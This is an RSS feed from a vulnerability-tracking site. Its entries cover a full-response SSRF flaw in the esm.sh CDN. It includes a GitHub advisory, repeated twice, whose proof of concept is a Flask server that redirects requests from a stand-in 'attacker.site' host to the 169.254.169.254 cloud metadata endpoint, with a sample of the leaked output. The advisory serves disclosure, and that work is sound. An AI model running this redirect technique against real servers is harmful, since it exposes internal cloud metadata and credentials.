<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Mon, 05 Oct 2026 23:59:21 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-273711</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-273711</link>
      <description>EUVD-2026-273711</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-273711</guid>
    </item>
    <item>
      <title>fkie_cve-2025-50180</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2025-50180</link>
      <description>&lt;p&gt;esm.sh is a no-build content delivery network (CDN) for web development. In version 136, esm.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability. Version 137 fixes the vulnerability.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;esm.sh is a no-build content delivery network (CDN) for web development. In version 136, esm.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability. Version 137 fixes the vulnerability.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2025-50180</guid>
    </item>
    <item>
      <title>GHSA-3c9r-837r-qqm4 — esm.sh is vulnerable to full-response SSRF</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-3c9r-837r-qqm4</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/esm-dev/esm.sh&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;esh.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;Vulnerable code location: https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/server/router.go#L511&lt;/p&gt;
&lt;p&gt;If the internal address has a suffix listed below, the attacker can obtain content from the specified internal address.&lt;/p&gt;
&lt;p&gt;eg: https://esm.sh/https://local.site/test.md&lt;/p&gt;
&lt;p&gt;```
&amp;#34;.js&amp;#34;, &amp;#34;.ts&amp;#34;, &amp;#34;.mjs&amp;#34;, &amp;#34;.mts&amp;#34;, &amp;#34;.jsx&amp;#34;, &amp;#34;.tsx&amp;#34;, &amp;#34;.cjs&amp;#34;, &amp;#34;.cts&amp;#34;, &amp;#34;.vue&amp;#34;, &amp;#34;.svelte&amp;#34;, &amp;#34;.md&amp;#34;, &amp;#34;.css&amp;#34;
```&lt;/p&gt;
&lt;p&gt;A 302 redirect can be used to bypass the suffix restriction.&lt;/p&gt;
&lt;p&gt;eg: https://esm.sh/https://attacker.site/test.md&lt;/p&gt;
&lt;p&gt;https://attacker.site/test.md 302 redirect to http://169.254.169.254/v1.json&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;Use Flask to start a server that returns a 302 redirect.&lt;/p&gt;
&lt;p&gt;```python
from flask import Flask, redirect&lt;/p&gt;
&lt;p&gt;app = Flask(__name__)&lt;/p&gt;
&lt;p&gt;@app.route(&amp;#39;/test.md&amp;#39;)
def redirect_test():
    return redirect(&amp;#34;http://169.254.169.254/v1.json&amp;#34;, code=302)&lt;/p&gt;
&lt;p&gt;if __name__ == &amp;#39;__main__&amp;#39;:
    app.run(host=&amp;#39;0.0.0.0&amp;#39;, port=80)
```&lt;/p&gt;
&lt;p&gt;Let esh.sh visit this site.&lt;/p&gt;
&lt;p&gt;https://esm.sh/https://attacker.site/test.md&lt;/p&gt;
&lt;p&gt;Attacker can obtain data from http://169.254.169.254/v1.json.&lt;/p&gt;
&lt;p&gt;```
var t=`&amp;lt;p&amp;gt;&amp;amp;lbrace;&amp;amp;quot;bgp&amp;amp;quot;:&amp;amp;lbrace;&amp;amp;quot;ipv4&amp;amp;quot;:&amp;amp;lbrace;&amp;amp;quot;my-address&amp;amp;quot;:&amp;amp;quot;&amp;amp;quot;,&amp;amp;quot;my-asn&amp;amp;quot;:&amp;amp;quot;&amp;amp;quot;,&amp;amp;quot;peer-address&amp;amp;quot;:&amp;amp;quot;&amp;amp;quot;,&amp;amp;quot;peer-asn&amp;amp;quot;:&amp;amp;quot;&amp;amp;quot;&amp;amp;rbrace;,&amp;amp;quot;ipv6&amp;amp;quot;:&amp;amp;lbrace;&amp;amp;quot;my-address&amp;amp;quot;:&amp;amp;quot;&amp;amp;quot;,&amp;amp;quot;my…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/esm-dev/esm.sh&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;esh.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;Vulnerable code location: https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/server/router.go#L511&lt;/p&gt;
&lt;p&gt;If the internal address has a suffix listed below, the attacker can obtain content from the specified internal address.&lt;/p&gt;
&lt;p&gt;eg: https://esm.sh/https://local.site/test.md&lt;/p&gt;
&lt;p&gt;```
&amp;#34;.js&amp;#34;, &amp;#34;.ts&amp;#34;, &amp;#34;.mjs&amp;#34;, &amp;#34;.mts&amp;#34;, &amp;#34;.jsx&amp;#34;, &amp;#34;.tsx&amp;#34;, &amp;#34;.cjs&amp;#34;, &amp;#34;.cts&amp;#34;, &amp;#34;.vue&amp;#34;, &amp;#34;.svelte&amp;#34;, &amp;#34;.md&amp;#34;, &amp;#34;.css&amp;#34;
```&lt;/p&gt;
&lt;p&gt;A 302 redirect can be used to bypass the suffix restriction.&lt;/p&gt;
&lt;p&gt;eg: https://esm.sh/https://attacker.site/test.md&lt;/p&gt;
&lt;p&gt;https://attacker.site/test.md 302 redirect to http://169.254.169.254/v1.json&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;Use Flask to start a server that returns a 302 redirect.&lt;/p&gt;
&lt;p&gt;```python
from flask import Flask, redirect&lt;/p&gt;
&lt;p&gt;app = Flask(__name__)&lt;/p&gt;
&lt;p&gt;@app.route(&amp;#39;/test.md&amp;#39;)
def redirect_test():
    return redirect(&amp;#34;http://169.254.169.254/v1.json&amp;#34;, code=302)&lt;/p&gt;
&lt;p&gt;if __name__ == &amp;#39;__main__&amp;#39;:
    app.run(host=&amp;#39;0.0.0.0&amp;#39;, port=80)
```&lt;/p&gt;
&lt;p&gt;Let esh.sh visit this site.&lt;/p&gt;
&lt;p&gt;https://esm.sh/https://attacker.site/test.md&lt;/p&gt;
&lt;p&gt;Attacker can obtain data from http://169.254.169.254/v1.json.&lt;/p&gt;
&lt;p&gt;```
var t=`&amp;lt;p&amp;gt;&amp;amp;lbrace;&amp;amp;quot;bgp&amp;amp;quot;:&amp;amp;lbrace;&amp;amp;quot;ipv4&amp;amp;quot;:&amp;amp;lbrace;&amp;amp;quot;my-address&amp;amp;quot;:&amp;amp;quot;&amp;amp;quot;,&amp;amp;quot;my-asn&amp;amp;quot;:&amp;amp;quot;&amp;amp;quot;,&amp;amp;quot;peer-address&amp;amp;quot;:&amp;amp;quot;&amp;amp;quot;,&amp;amp;quot;peer-asn&amp;amp;quot;:&amp;amp;quot;&amp;amp;quot;&amp;amp;rbrace;,&amp;amp;quot;ipv6&amp;amp;quot;:&amp;amp;lbrace;&amp;amp;quot;my-address&amp;amp;quot;:&amp;amp;quot;&amp;amp;quot;,&amp;amp;quot;my…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-3c9r-837r-qqm4</guid>
    </item>
  </channel>
</rss>
